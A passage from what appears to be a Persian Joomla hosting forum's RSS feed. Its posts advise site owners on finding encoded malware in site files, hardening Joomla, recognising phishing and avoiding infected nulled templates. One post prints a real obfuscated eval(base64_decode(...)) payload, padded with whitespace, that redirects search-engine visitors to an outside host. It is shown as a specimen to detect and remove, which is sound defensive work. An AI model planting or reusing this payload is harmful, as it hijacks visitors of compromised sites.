  و به سایت دیدن لینک ها برای شما امکان پذیر نیست. لطفا <a href="https://forums.parsjoom.ir/member.php?action=register">ثبت نام کنید</a> یا <a href="https://forums.parsjoom.ir/member.php?action=login">وارد حساب خود شوید</a> تا بتوانید لینک ها را ببینید.<br />
 برای کد کردن یا باز کردن کد میدیم ... <br />
چیز جالبی که هست برای مثال همون لینک رو شما دوباره به base64 کد میکنید ... چیزی شبیه این دریافت میکنید (  aHR0cDovL2ZvcnVtcy5wYXJzam9vbS5pcg==  )<br />
خب حالا همین متن رو کپی کرده و میبرید به ++Notepad ، از اونجا خیلی راحت میتونید دونه دونه لینکها رو پیدا کنید ...<br />
<br />
<br />
( این یه آموزش نیست ، اولین تجربه من بود که شاید بدرد بخوره )]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[یافتن کدهای مخرب و کد شده که توسط هکرها در فایل ها جاسازی میشوند]]></title>
			<link>https://forums.parsjoom.ir/thread-14580.html</link>
			<pubDate>Mon, 24 Mar 2014 09:14:59 +0000</pubDate>
			<guid isPermaLink="false">https://forums.parsjoom.ir/thread-14580.html</guid>
			<description><![CDATA[درود<br />
گاهی سایت شما مورد حمله قرار میگیرد و یا اینکه هکر فقط از آن سوء استفاده میکند مثلا برای ارسال اسپم یا گرفتن بازدید و لینک دادن به سایتهای دلخواه و یا از همه بدتر برای فیشینگ.<br />
<br />
در این تاپیک من مواردی رو که خودم دیدم برای شما توضیح میدهم چون در پارس جوم هاست گاهی با این موارد روبرو میشویم لازم دونستم برای دوستان هم توضیح بدم.<br />
گاهی شما سایتتون رو بررسی میکنید و چندین فایل مشکوک را یافته و حذف میکنید و مطمئن میشوید سایت ایمن شده درصورتی که پیدا کردن تمامی کدها و فایل ها تقریبا غیرممکن خواهد بود و یا به سختی انجام پذیر است.<br />
<br />
<span style="color: #FF0000;"><span style="font-size: medium;">مشکل از کجا آغاز میشود ؟</span></span><br />
<br />
مشکل ابتدایی احساس زرنگی ماست وقتی میبینیم در سایت هایی مانند جوملا فور یو یا تم اوکی و... هرچه افزونه تجاری نیاز داریم موجود است و سفارش سایت میگیریم و با استفاده از این افزونه و قالب ها برای مشتری سایت راه اندازی میکنیم و متاسفانه تمام کسانی هم که در اینترنت مشغول فروش قالب ها و بسته های نصبی فارسی شده هستند از همین قالب ها استفاده میکنند و چون معمولا کد هم میکنند مشکل را دو چندان میکنند و براحتی کدهای مخرب جاسازی شده در فایل ها توسط منتشر کننده را برای او کد میکنند و تحویل شما میدهند.البته من یک نفر را دیدم که قالب هارو از سازنده میخره و ترجمه میکنه و میفروشه ولی خوب من نه کسی رو تایید میکنم و نه رد میکنم ولی چون همون بسته هارو بچه ها روی سرور ما استفاده میکنند با مشکلاتشون روبرو شدم.<br />
<br />
مشکل دیگر عدم رعایت موارد امنیتی ابتدایی است که برخی دوستان براش وقت نمیزارند که در مورد افزایش ایمنی مطالب زیادی در انجمن و نت هست.<br />
توجه داشته باشید بعد از نصب جوملا و بالا آوردن سایت حتما باید سئو را فعال کنید چون بعد از معرفی به گوگل و یا شناسایی سایت شما توسط گوگل به سرعت لینک های شما در گوگل ایندکس میشود و هکرها با جستجوی لینک های مشکل دار براحتی سایت شمارا پیدا میکنند برای مثال اونها آدرس را به صورت زیر تایپ میکنند :<br />
<br />
<div class="codeblock">
<div class="title">کد: <br />
</div><div class="body" dir="ltr"><code>index.php/com-content/...</code></div></div>
<br />
خوب حالا چند نمونه از کدهایی که در فایل ها کپی میشوند را براتون مثال میزنم.در فایل index.php یکی از سایتهای آلوده کد زیر در ابتدای فایل قرار داده شده بود :<br />
<br />
<div class="codeblock">
<div class="title">کد: <br />
</div><div class="body" dir="ltr"><code>&lt;?php&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;eval(base64_decode("CgplcnJvcl9yZXBvcnRpbmcoMCk7CiRxYXpwbG09aGVhZGVyc19zZW50KCk7CmlmICghJHFhenBsbSl7&#8203;CiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsKJHVhZz0kX1NFUlZFUlsnSFRUUF9VU0VS&#8203;X0FHRU5UJ107CmlmICgkdWFnKSB7CmlmIChzdHJpc3RyKCR1YWcsIk1TSUUiKSl7CnByZWdfbWF0Y2gg&#8203;KCIvbXNpZSAoWzAtOS5dKykvaSIsJHVhZywkbXYpOwppZiAoaXNzZXQoJG12WzFdKSl7CiRtdj1zdHJf&#8203;cmVwbGFjZSgiLiIsIiIsJG12WzFdKTsKfQp9CmlmKCFwcmVnX21hdGNoKCIvXjY2XC4yNDlcLi8iLCRf&#8203;U0VSVkVSWydSRU1PVEVfQUREUiddKSl7CmlmIChzdHJpc3RyKCR1YWcsIk1TSUUiKSBhbmQgJG12Pj05&#8203;MCl7CmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvby4iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaW5n&#8203;LiIpIG9yIHByZWdfbWF0Y2ggKCIvZ29vZ2xlXC4oLio/KVwvdXJsXD9zYS8iLCRyZWZlcmVyKSkgewppZiAoIXN0cmlzdHIoJHJlZmVyZXIsImNhY2hlIikgYW5k&#8203;ICFzdHJpc3RyKCRyZWZlcmVyLCJpbnVybCIpIGFuZCAhc3RyaXN0cigkcmVmZXJlciwiRWVZcDNENyIp&#8203;KXsKaGVhZGVyKCJMb2NhdGlvbjogaHR0cDovL2dzYm5jbS5lcGFjLnRvLyIpOwpleGl0KCk7Cn0KfQp9&#8203;Cn0KfQp9"));</code></div></div>
<br />
وقتی شما از نرم افزارهای متن باز استفاده میکنید وجود هرگونه متن کد شده مشکوک است و اکثر هکرها کدهاشن رو به روش بالا کد میکنند و اگر دقت کنید base64 میبینید.شما میتونید این کد رو حذف کنید و فایل رو ذخیره کنید.<br />
در سایتی که من این کد را برای مثال برای شما قرار دادم بیش از 3500 فایل حاوی کدهایی که کد شده هستند وجود دارید و حالا بشینید حساب کنید طراحی مجدد سایت بصرفه تره یا بررسی همه فایل ها و مطابقت اونها با فایل اوریجینال.<br />
<br />
خوب اگر مایل بودید سایتتون رو بررسی کنید باید چه بکنید چون آنتی ویروس سرور اینگونه فایل هارو پیدا نمیکنه !<br />
اگر روی سرور cxs یا همون نرم افزار آنتی شل ConfigServer eXploit Scanner نصب باشد میتونید از مدیر سرور یا هاستینگ درخواست کنید که سایت شما را اسکن کند و گزارش آن را برای شما ارسال کند.<br />
البته ذکر کنید که هنگام اسکن Deep scan و Display md5sum را هم تیک بزند تا کدهای درون فایل ها هم بررسی شوند.<br />
<br />
وقتی شما کار رو از ابتدا درست شروع نکنید سایت شما مانند یک پارک برای هکرها میشود که هروقت دلشون میخواد میان و میرن البته همیشه هاستینگ ها موارد ایمنی رو رعایت میکنند و تنظیمات و نرم افزارهای مورد نیاز رو استفاده میکنند اما هرچقدر هم که سرور ایمن باشه باز وقتی خود مدیر سایت حجم وسیعی از فایل ها و کدهای مخرب مخفی رو دائما استفاده میکنه نتیجه کار معلومه.<br />
<br />
خوب سایت دیگری که قبلا هم من معرفی کردم سایت myjoomla.com است که میتونید در آن عضو شوید و پلاگینی که بهتون میده نصب کنید و سایتتون رو بررسی کنید البته این سایت فقط فایل های اصلی جوملارو با نسخه اوریجینال تطابق میده و تغییرات را به شما گزارش میکند.<br />
<br />
نتیجه اینه که اگر برای سایتتون و مشتری ارزش قائل هستید از افزونه و قالب های وارز استفاده نکنید و یا از خرید قالب های ترجمه شده و کد شده اجتناب کنید چون در اینصورت راهی برای یافتن مشکل نخواهد بود.<br />
<br />
برای تهیه افزونه های اوریجینال راههای زیادی است.میتونید سفارش بدید براتون خریداری بشه و معمولا با پورسانت کمی براتون خریداری میکنند و یا بصورت جمعی خرید کنید که خرید بصورت جمعی مناسب تر خواهد بود.<br />
درآخر اگر در پارس جوم هاست سرویسی دارید میتونید درخواست کنید تا براتون سایت شما را اسکن و گزارش آن را به ایمیل شما ارسال کنم.البته این درخواست فقط از طریق ارسال تیکت در پارس جوم هاست قابل اجرا خواهد بود.<br />
<br />
وجود فایل های شبیه نام های فایل های موجود و یا فایل های اچ تی اکسز در پوشه های مختلف و یا پوشه ای با پیشوند ماژول در پوشه ماژول ها مانند mod_msn و یا هر نامی که برای شما آشنا نیست مشکوک است و باید بعد از بررسی حتما حذف شود.برخی هکرها پوشه ای درست میکنند و شما وقتی بازش میکنید میبینید فایل های xml و php و.. وجود دارد در صورتی که آنها ساختگی هستند و برای گمراه کردن شما ایجاد شده اند.<br />
موفق باشید]]></description>
			<content:encoded><![CDATA[درود<br />
گاهی سایت شما مورد حمله قرار میگیرد و یا اینکه هکر فقط از آن سوء استفاده میکند مثلا برای ارسال اسپم یا گرفتن بازدید و لینک دادن به سایتهای دلخواه و یا از همه بدتر برای فیشینگ.<br />
<br />
در این تاپیک من مواردی رو که خودم دیدم برای شما توضیح میدهم چون در پارس جوم هاست گاهی با این موارد روبرو میشویم لازم دونستم برای دوستان هم توضیح بدم.<br />
گاهی شما سایتتون رو بررسی میکنید و چندین فایل مشکوک را یافته و حذف میکنید و مطمئن میشوید سایت ایمن شده درصورتی که پیدا کردن تمامی کدها و فایل ها تقریبا غیرممکن خواهد بود و یا به سختی انجام پذیر است.<br />
<br />
<span style="color: #FF0000;"><span style="font-size: medium;">مشکل از کجا آغاز میشود ؟</span></span><br />
<br />
مشکل ابتدایی احساس زرنگی ماست وقتی میبینیم در سایت هایی مانند جوملا فور یو یا تم اوکی و... هرچه افزونه تجاری نیاز داریم موجود است و سفارش سایت میگیریم و با استفاده از این افزونه و قالب ها برای مشتری سایت راه اندازی میکنیم و متاسفانه تمام کسانی هم که در اینترنت مشغول فروش قالب ها و بسته های نصبی فارسی شده هستند از همین قالب ها استفاده میکنند و چون معمولا کد هم میکنند مشکل را دو چندان میکنند و براحتی کدهای مخرب جاسازی شده در فایل ها توسط منتشر کننده را برای او کد میکنند و تحویل شما میدهند.البته من یک نفر را دیدم که قالب هارو از سازنده میخره و ترجمه میکنه و میفروشه ولی خوب من نه کسی رو تایید میکنم و نه رد میکنم ولی چون همون بسته هارو بچه ها روی سرور ما استفاده میکنند با مشکلاتشون روبرو شدم.<br />
<br />
مشکل دیگر عدم رعایت موارد امنیتی ابتدایی است که برخی دوستان براش وقت نمیزارند که در مورد افزایش ایمنی مطالب زیادی در انجمن و نت هست.<br />
توجه داشته باشید بعد از نصب جوملا و بالا آوردن سایت حتما باید سئو را فعال کنید چون بعد از معرفی به گوگل و یا شناسایی سایت شما توسط گوگل به سرعت لینک های شما در گوگل ایندکس میشود و هکرها با جستجوی لینک های مشکل دار براحتی سایت شمارا پیدا میکنند برای مثال اونها آدرس را به صورت زیر تایپ میکنند :<br />
<br />
<div class="codeblock">
<div class="title">کد: <br />
</div><div class="body" dir="ltr"><code>index.php/com-content/...</code></div></div>
<br />
خوب حالا چند نمونه از کدهایی که در فایل ها کپی میشوند را براتون مثال میزنم.در فایل index.php یکی از سایتهای آلوده کد زیر در ابتدای فایل قرار داده شده بود :<br />
<br />
<div class="codeblock">
<div class="title">کد: <br />
</div><div class="body" dir="ltr"><code>&lt;?php&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;eval(base64_decode("CgplcnJvcl9yZXBvcnRpbmcoMCk7CiRxYXpwbG09aGVhZGVyc19zZW50KCk7CmlmICghJHFhenBsbSl7&#8203;CiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsKJHVhZz0kX1NFUlZFUlsnSFRUUF9VU0VS&#8203;X0FHRU5UJ107CmlmICgkdWFnKSB7CmlmIChzdHJpc3RyKCR1YWcsIk1TSUUiKSl7CnByZWdfbWF0Y2gg&#8203;KCIvbXNpZSAoWzAtOS5dKykvaSIsJHVhZywkbXYpOwppZiAoaXNzZXQoJG12WzFdKSl7CiRtdj1zdHJf&#8203;cmVwbGFjZSgiLiIsIiIsJG12WzFdKTsKfQp9CmlmKCFwcmVnX21hdGNoKCIvXjY2XC4yNDlcLi8iLCRf&#8203;U0VSVkVSWydSRU1PVEVfQUREUiddKSl7CmlmIChzdHJpc3RyKCR1YWcsIk1TSUUiKSBhbmQgJG12Pj05&#8203;MCl7CmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvby4iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaW5n&#8203;LiIpIG9yIHByZWdfbWF0Y2ggKCIvZ29vZ2xlXC4oLio/KVwvdXJsXD9zYS8iLCRyZWZlcmVyKSkgewppZiAoIXN0cmlzdHIoJHJlZmVyZXIsImNhY2hlIikgYW5k&#8203;ICFzdHJpc3RyKCRyZWZlcmVyLCJpbnVybCIpIGFuZCAhc3RyaXN0cigkcmVmZXJlciwiRWVZcDNENyIp&#8203;KXsKaGVhZGVyKCJMb2NhdGlvbjogaHR0cDovL2dzYm5jbS5lcGFjLnRvLyIpOwpleGl0KCk7Cn0KfQp9&#8203;Cn0KfQp9"));</code></div></div>
<br />
وقتی شما از نرم افزارهای متن باز استفاده میکنید وجود هرگونه متن کد شده مشکوک است و اکثر هکرها کدهاشن رو به روش بالا کد میکنند و اگر دقت کنید base64 میبینید.شما میتونید این کد رو حذف کنید و فایل رو ذخیره کنید.<br />
در سایتی که من این کد را برای مثال برای شما قرار دادم بیش از 3500 فایل حاوی کدهایی که کد شده هستند وجود دارید و حالا بشینید حساب کنید طراحی مجدد سایت بصرفه تره یا بررسی همه فایل ها و مطابقت اونها با فایل اوریجینال.<br />
<br />
خوب اگر مایل بودید سایتتون رو بررسی کنید باید چه بکنید چون آنتی ویروس سرور اینگونه فایل هارو پیدا نمیکنه !<br />
اگر روی سرور cxs یا همون نرم افزار آنتی شل ConfigServer eXploit Scanner نصب باشد میتونید از مدیر سرور یا هاستینگ درخواست کنید که سایت شما را اسکن کند و گزارش آن را برای شما ارسال کند.<br />
البته ذکر کنید که هنگام اسکن Deep scan و Display md5sum را هم تیک بزند تا کدهای درون فایل ها هم بررسی شوند.<br />
<br />
وقتی شما کار رو از ابتدا درست شروع نکنید سایت شما مانند یک پارک برای هکرها میشود که هروقت دلشون میخواد میان و میرن البته همیشه هاستینگ ها موارد ایمنی رو رعایت میکنند و تنظیمات و نرم افزارهای مورد نیاز رو استفاده میکنند اما هرچقدر هم که سرور ایمن باشه باز وقتی خود مدیر سایت حجم وسیعی از فایل ها و کدهای مخرب مخفی رو دائما استفاده میکنه نتیجه کار معلومه.<br />
<br />
خوب سایت دیگری که قبلا هم من معرفی کردم سایت myjoomla.com است که میتونید در آن عضو شوید و پلاگینی که بهتون میده نصب کنید و سایتتون رو بررسی کنید البته این سایت فقط فایل های اصلی جوملارو با نسخه اوریجینال تطابق میده و تغییرات را به شما گزارش میکند.<br />
<br />
نتیجه اینه که اگر برای سایتتون و مشتری ارزش قائل هستید از افزونه و قالب های وارز استفاده نکنید و یا از خرید قالب های ترجمه شده و کد شده اجتناب کنید چون در اینصورت راهی برای یافتن مشکل نخواهد بود.<br />
<br />
برای تهیه افزونه های اوریجینال راههای زیادی است.میتونید سفارش بدید براتون خریداری بشه و معمولا با پورسانت کمی براتون خریداری میکنند و یا بصورت جمعی خرید کنید که خرید بصورت جمعی مناسب تر خواهد بود.<br />
درآخر اگر در پارس جوم هاست سرویسی دارید میتونید درخواست کنید تا براتون سایت شما را اسکن و گزارش آن را به ایمیل شما ارسال کنم.البته این درخواست فقط از طریق ارسال تیکت در پارس جوم هاست قابل اجرا خواهد بود.<br />
<br />
وجود فایل های شبیه نام های فایل های موجود و یا فایل های اچ تی اکسز در پوشه های مختلف و یا پوشه ای با پیشوند ماژول در پوشه ماژول ها مانند mod_msn و یا هر نامی که برای شما آشنا نیست مشکوک است و باید بعد از بررسی حتما حذف شود.برخی هکرها پوشه ای درست میکنند و شما وقتی بازش میکنید میبینید فایل های xml و php و.. وجود دارد در صورتی که آنها ساختگی هستند و برای گمراه کردن شما ایجاد شده اند.<br />
موفق باشید]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[بالا بردن امنیت جوملا با حذف قالب های پیش فرض و پوشه تصاویر پیش فرض]]></title>
			<link>https://forums.parsjoom.ir/thread-13157.html</link>
			<pubDate>Mon, 14 Oct 2013 15:28:09 +0000</pubDate>
			<guid isPermaLink="false">https://forums.parsjoom.ir/thread-13157.html</guid>
			<description><![CDATA[درود<br />
با توجه به اینکه پارس جوم دارای هاستینگ می باشد و من با موارد زیادی برخورد میکنم و روزانه چندین ساعت وقتم صرف مانیتورینگ سایت ها میشود برخی از عوال نفوذ به سایت ها رو که عمومی هستند برای دوستان منتشر میکنم.<br />
در جوملا چندقالب و پوشه پیش فرض داریم که مسیر اون برای همه شناخته شده است !!!!!!<br />
یکی از مهمترین کارهایی که باید انجام دهید حذف قالب های پیش فرض موجود در جوملاست.وقتی سایت رو بالا اوردید و قالب دلخواه رو نصب کردید ایتدا قالب هایی رو که استفاده نمیکنید از مدیریت افزونه ها حذف کنید !<br />
دیگر اینکه در پوشه تصاویر هم پوشه ای به نام  stories هست که هکرها علاقه مند به این پوشه هستند و معمولا فایل های خود را در این پوشه آپلود میکنند !<br />
یکی از کارهای مهم عدم استفاده از این پوشه و حذف آن است.البته بهتر این است کلا پوشه images را غیر قابل نوشتن کنید و فقط زمانی که میخواهید تصویری آپلود کنید قابل نوشتن کنید البته اینکار برای سایت هایی که روزانه مطالب زیادی منتشر میکنند قابل اجرا نیست ولی میتوان تصاویر را در پوشه هایی در پوشه images که خودتون ایجاد کرده اید اپلود کنید و بعد از مدتی که تعدادی تصویر در آن پوشه آپلود کردید آن را غیر قابل نوشتن کنید و پوشه جدیدی ایجاد کنید!<br />
البته اینکارها باز کاملا باز دارنده نیست و شما باید همیشه این پوشه هارا زیر نظر داشته باشید و هرگاه فایل مشکوکی دیدید حتما حذف کنید.<br />
فایل هایی با پسوند gif و php و یا فایل اچ تی اکسز لزومی ندارد در پوشه تصاویر باشد مگر خودتا تصویری با پسوند gif آپلود کرده باشید و بهترین کار سرزدن به این پوشه ها و بررسی ان هاست.<br />
هکرها برای عدم شناسایی کدهاشون توسط آنتی ویروس های سرور اونها رو کد میکنند که باید حتما توسط آنتی مالیور شناسایی شوند.<br />
اگر در پارس جوم هاست سرویس دارید میتونید از آنتی ویروس سرور روزانه برای اسکن سایت خود استفاده کنید و یا در پارس جوم هاست درخواست بدید تا هاست شما با آنتی مخرب اسکن شود البته قبلش حتما از فایل های خود بک آپ تهیه کنید.<br />
با بررسی مدام سایت با پوشه های جوملا اشنا میشوید و گاهی پوشه ای مشاهده کردید جدید بود و نا اشنا حتما بررسی کنید ببینید از این پوشه برای فیشینگ استفاده نشود.<br />
درکل در این دوره که تعداد افرادی که سعی در نفوذ در سایت ها مختلف دارند زیاد شده اند باید همیشه مراقب سایت های خود باشید و از وظایف یک مدیر سایت است که سایت را زیر نظر داشته باشد.<br />
حذف تگ جنریتور جوملا<br />
فعال سازی سئو<br />
حذف قالب های پیش فرض و بلا استفاده جوملا<br />
حذف افزونه های غیر ضروری<br />
عدم استفاده از قالب ها و افزونه های وارز<br />
بروزرسانی به اخرین نسخه جوملا<br />
عدم استفاده از پوشه stories و دیگر پوشه های پیش فرض موجود در پوشه images (تصاویر)<br />
قرار دادن پسورد از طریق کنترل پنل هاست برروی پوشه ادمین جوملا<br />
نصب افزونه های امنیتی مانند JHackgurd (البته ممکن است مشکلاتی مانند عدم ارسال نظرات پیش بیاورد) و آر اس فایروال و ادمین تولز<br />
غیر قابل نوشتن کردن سطح دسترسی فایل کانفیگوریشن و ایندکس دات پی اچ پی موجود در روت جوملا و پوشه قالب ها<br />
از کارهایی است که میتوانید انجام دهید تا امنیت رو بالا ببرید.<br />
بستن دسترسی شل و سایم لینک هم از کارهایی است که در سرور باید صورت پذیرد تا درصورت آپلود فایل های مخرب قابل استفاده نباشند.<br />
<br />
عمده سایت هایی که دچار هک و نفوذ میشوند سایت هایی هستند که موارد ایمنی توجه نمیکنند و این باعث میشه براحتی مورد حمله قرار بگیرند.]]></description>
			<content:encoded><![CDATA[درود<br />
با توجه به اینکه پارس جوم دارای هاستینگ می باشد و من با موارد زیادی برخورد میکنم و روزانه چندین ساعت وقتم صرف مانیتورینگ سایت ها میشود برخی از عوال نفوذ به سایت ها رو که عمومی هستند برای دوستان منتشر میکنم.<br />
در جوملا چندقالب و پوشه پیش فرض داریم که مسیر اون برای همه شناخته شده است !!!!!!<br />
یکی از مهمترین کارهایی که باید انجام دهید حذف قالب های پیش فرض موجود در جوملاست.وقتی سایت رو بالا اوردید و قالب دلخواه رو نصب کردید ایتدا قالب هایی رو که استفاده نمیکنید از مدیریت افزونه ها حذف کنید !<br />
دیگر اینکه در پوشه تصاویر هم پوشه ای به نام  stories هست که هکرها علاقه مند به این پوشه هستند و معمولا فایل های خود را در این پوشه آپلود میکنند !<br />
یکی از کارهای مهم عدم استفاده از این پوشه و حذف آن است.البته بهتر این است کلا پوشه images را غیر قابل نوشتن کنید و فقط زمانی که میخواهید تصویری آپلود کنید قابل نوشتن کنید البته اینکار برای سایت هایی که روزانه مطالب زیادی منتشر میکنند قابل اجرا نیست ولی میتوان تصاویر را در پوشه هایی در پوشه images که خودتون ایجاد کرده اید اپلود کنید و بعد از مدتی که تعدادی تصویر در آن پوشه آپلود کردید آن را غیر قابل نوشتن کنید و پوشه جدیدی ایجاد کنید!<br />
البته اینکارها باز کاملا باز دارنده نیست و شما باید همیشه این پوشه هارا زیر نظر داشته باشید و هرگاه فایل مشکوکی دیدید حتما حذف کنید.<br />
فایل هایی با پسوند gif و php و یا فایل اچ تی اکسز لزومی ندارد در پوشه تصاویر باشد مگر خودتا تصویری با پسوند gif آپلود کرده باشید و بهترین کار سرزدن به این پوشه ها و بررسی ان هاست.<br />
هکرها برای عدم شناسایی کدهاشون توسط آنتی ویروس های سرور اونها رو کد میکنند که باید حتما توسط آنتی مالیور شناسایی شوند.<br />
اگر در پارس جوم هاست سرویس دارید میتونید از آنتی ویروس سرور روزانه برای اسکن سایت خود استفاده کنید و یا در پارس جوم هاست درخواست بدید تا هاست شما با آنتی مخرب اسکن شود البته قبلش حتما از فایل های خود بک آپ تهیه کنید.<br />
با بررسی مدام سایت با پوشه های جوملا اشنا میشوید و گاهی پوشه ای مشاهده کردید جدید بود و نا اشنا حتما بررسی کنید ببینید از این پوشه برای فیشینگ استفاده نشود.<br />
درکل در این دوره که تعداد افرادی که سعی در نفوذ در سایت ها مختلف دارند زیاد شده اند باید همیشه مراقب سایت های خود باشید و از وظایف یک مدیر سایت است که سایت را زیر نظر داشته باشد.<br />
حذف تگ جنریتور جوملا<br />
فعال سازی سئو<br />
حذف قالب های پیش فرض و بلا استفاده جوملا<br />
حذف افزونه های غیر ضروری<br />
عدم استفاده از قالب ها و افزونه های وارز<br />
بروزرسانی به اخرین نسخه جوملا<br />
عدم استفاده از پوشه stories و دیگر پوشه های پیش فرض موجود در پوشه images (تصاویر)<br />
قرار دادن پسورد از طریق کنترل پنل هاست برروی پوشه ادمین جوملا<br />
نصب افزونه های امنیتی مانند JHackgurd (البته ممکن است مشکلاتی مانند عدم ارسال نظرات پیش بیاورد) و آر اس فایروال و ادمین تولز<br />
غیر قابل نوشتن کردن سطح دسترسی فایل کانفیگوریشن و ایندکس دات پی اچ پی موجود در روت جوملا و پوشه قالب ها<br />
از کارهایی است که میتوانید انجام دهید تا امنیت رو بالا ببرید.<br />
بستن دسترسی شل و سایم لینک هم از کارهایی است که در سرور باید صورت پذیرد تا درصورت آپلود فایل های مخرب قابل استفاده نباشند.<br />
<br />
عمده سایت هایی که دچار هک و نفوذ میشوند سایت هایی هستند که موارد ایمنی توجه نمیکنند و این باعث میشه براحتی مورد حمله قرار بگیرند.]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[فیشینگ چیست؟]]></title>
			<link>https://forums.parsjoom.ir/thread-13088.html</link>
			<pubDate>Mon, 07 Oct 2013 10:43:25 +0000</pubDate>
			<guid isPermaLink="false">https://forums.parsjoom.ir/thread-13088.html</guid>
			<description><![CDATA[<span style="font-size: large;"><span style="font-size: medium;">فیشینگ تلاشی از سوی مهاجمان اینترنتی (فیشرها) برای بدست آوردن اطلاعات حساس و محرمانه افراد مانند حساب بانکی آن هاست. روش آن ها به گونه ای است که آدرس و ظاهر سایت های معتبری مثل بانک ها را جعل می کنند و لینک آن  را از طریق ایمل یا سایت های دیگر در اختیار افراد قرار می دهند. افرادی که مورد حمله قرار میگیرند اطلاعات خود را وارد فرم های سایت جعلی مورد نظر می کنند و فیشرها به این شکل اموال زیادی را غارت می کنند. همچنین فیشینگ گاهی به شکل تلفنی انجام می شود و مهاجم با استفاده از سرویس های صدایی که با استفاده از آی پی مهیا شده ، از افراد می خواهند پین کد خود را وارد کنند و بدین صورت به اطلاعات محرمانه آن ها دسترسی پیدا می کنند.</span></span>]]></description>
			<content:encoded><![CDATA[<span style="font-size: large;"><span style="font-size: medium;">فیشینگ تلاشی از سوی مهاجمان اینترنتی (فیشرها) برای بدست آوردن اطلاعات حساس و محرمانه افراد مانند حساب بانکی آن هاست. روش آن ها به گونه ای است که آدرس و ظاهر سایت های معتبری مثل بانک ها را جعل می کنند و لینک آن  را از طریق ایمل یا سایت های دیگر در اختیار افراد قرار می دهند. افرادی که مورد حمله قرار میگیرند اطلاعات خود را وارد فرم های سایت جعلی مورد نظر می کنند و فیشرها به این شکل اموال زیادی را غارت می کنند. همچنین فیشینگ گاهی به شکل تلفنی انجام می شود و مهاجم با استفاده از سرویس های صدایی که با استفاده از آی پی مهیا شده ، از افراد می خواهند پین کد خود را وارد کنند و بدین صورت به اطلاعات محرمانه آن ها دسترسی پیدا می کنند.</span></span>]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[فایل های آلوده و مخرب در قالب و افزونه های وارز]]></title>
			<link>https://forums.parsjoom.ir/thread-13036.html</link>
			<pubDate>Mon, 30 Sep 2013 10:02:51 +0000</pubDate>
			<guid isPermaLink="false">https://forums.parsjoom.ir/thread-13036.html</guid>
			<description><![CDATA[درود<br />
متاسفانه بسیاری از کاربران و طراحان سایت از قالب و افزونه های وارز استفاده میکنند.در میان این الحاقات برخی ممکنه آلوده باشند.<br />
هکرها با ترفندهای مختلف فایل های خود را در اینگونه الحاقات قرار میدهند و از نام های مشابه استفاده میکنند مثلا در اکثر اسکریپت ها فایلی به نام index.php هست و آنها ممکن است از نام هایی مانند indexs.php یا indexser.php یا هر نام دیگری استفاده کنند تا کاربر متوجه نام مشکوک فایل نشود.<br />
برخی هم فایل با نام مخصوص خودشون رو دارند که اینهارو راحت تر میشه پیدا کرد.<br />
وجود فایل های با پسوند php در پوشه تصاویر معنی ندارد و باید همیشه مراقب پوشه ایمجز جوملا باشید و بررسی کنید.حتما پوشه های دیگر موجود در پوشه ایمجز هم بررسی کنید مخصوصا پوشه stories و حتما قالب و افزونه های پیش فرض جوملا رو که نیاز ندارید حذف کنید بخصوص قالب های beez که هکرها مسیرهای اینهارو بیشتر استفاده میکنند.<br />
<br />
یا برخی شل هارو تغییر پسوند میدهند و از پسودندهایی مانند gif استفاده میکنند و بعدا سعی در تغییر پسوند و استفاده میکنند.<br />
بهرحال دوستان باید مراقب این موارد باشند ضمن اینکه موارد امنیتی رو رعایت میکنند سعی کنند از افزونه های وارز تا حد امکان استفاده نکنند.<br />
بیشتر مواردی رو که من در سرور مشاهده میکنم از این دسته فایل ها هستند.<br />
امروز دیدم یکی از دوستان وردپرس نصب کرده و در پوشه قالب ها فایلی به نام 404.php است که یک شل است که با این نام جایگزین فایل وردپرس شده احتمالا.قالب هم از قالب های وارز بود.<br />
جالب اینه که این بهترین روش برای هک کردن یک سایت است و فقط کافیست یک لینک رندم و غیر موجود در سایت فراخوانی بشه تا صفحه 404 رو که صفحه مخرب هست مشاهده کرد.<br />
بهرحال مهمترین وظیفه یک مدیر سایت تامین امنیت سایت و گرفتن بک آپ های منظم است.برای امنیت هم استفاده از الحاقات وارز کمی خطرناک است.<br />
مصیبت اصلی و مهم اینه که الان مد شده تقریبا تمامی فروشنده های قالب و افزونه افزونه های وارز رو دانلود و فارسی و میفروشند البته ممکنه برخی از دوستان نسخه های اوریجینال رو خریداری و ترجمه کنند و بفروشند ولی تا اونجا که من دیدم اکثرا از وارز استفاده میکنند.<br />
<br />
این موارد گوشه ای از موارد موجود هستند و دنیای هک خیلی گستره است و روش های مختلفی برای نفوذ به سایت استفاده میکنند.]]></description>
			<content:encoded><![CDATA[درود<br />
متاسفانه بسیاری از کاربران و طراحان سایت از قالب و افزونه های وارز استفاده میکنند.در میان این الحاقات برخی ممکنه آلوده باشند.<br />
